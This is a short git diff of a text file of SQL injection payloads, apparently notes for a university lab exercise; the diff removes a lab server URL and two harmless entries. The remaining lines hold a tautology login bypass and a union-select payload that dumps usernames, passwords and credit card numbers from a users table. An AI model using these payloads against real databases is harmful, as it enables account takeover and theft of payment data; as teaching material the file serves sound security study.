diff --git a/injections.txt b/injections.txt
index bae5109..bee2649 100644
--- a/injections.txt
+++ b/injections.txt
@@ -1,6 +1,3 @@
-http://snafu.staff.uod.otago.ac.nz:8080/injection/
-
-
// basic injection
' or 1=1;--
@@ -9,38 +6,3 @@
// get entire users table
' union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name; --
-
-// change color
-food
-
-// change back button
-food
Back